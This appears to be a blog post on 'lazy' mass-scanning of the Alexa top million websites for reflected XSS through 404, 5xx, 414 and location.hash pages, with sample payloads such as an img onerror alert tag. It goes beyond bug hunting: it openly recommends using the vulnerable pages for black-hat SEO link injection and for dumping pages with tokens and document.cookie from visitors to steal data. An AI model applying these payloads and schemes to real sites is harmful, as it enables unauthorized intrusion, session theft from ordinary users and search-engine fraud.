So either you should look for XSS on a major website or find tons of random XSSes in hope some of them will turn out to be any useful.
What is a Lazy technique? Only one GET request is required to check if there's XSS. Here are lazy techniques i have in mind:
- Developers don't spend much time on 404 pages. So there's >0% chance 404 page reflects unescaped input. The script above does simply GETs sitename.com/<img src=yolo onerror=alert(0)> and checks if the response body has the payload. Easy right?
- There are also 5xx errors, try playing with HPP (x=1&x[hash]=1)
- Don't forget about 414 error (send super long payload).
- site.com/#<img src=x> for $(location.hash) might work too but you need to catch alert execution in runtime.
- please share other lazy tricks you know!
So I took the first 1k of Alexa and apparently 10+ are vulnerable (wikia, rottentomatoes etc). The script is not perfect (if status code is 404 it doesn't check the body) — feel free to improve it. For 1kk output might be 10k+ of vulnerable websites having PR more than 1. PROFITZ.
Here you can take Alexa top 1 000 000 in CSV
And make some money. For (black) SEO purposes you can make the google bot visit popular-website.com/<a href=//yoursite.com>GOOD</a> etc.
Also send some cheap human traffic on the XSSed pages and dump the page (with tokens in it) + document.cookie to analyse / data mine it, hoping to find something useful.
So the recipe is simple: take that 1 million, create a lazy XSS pattern (consider more comprehensive patterns, ?redirect_to=..) then use the XSSed page for SEO / stealing cookies.
Completely hassle free way to find bugs. Oh, also check out the Sakurity Hustlers - Bug Hunters Top.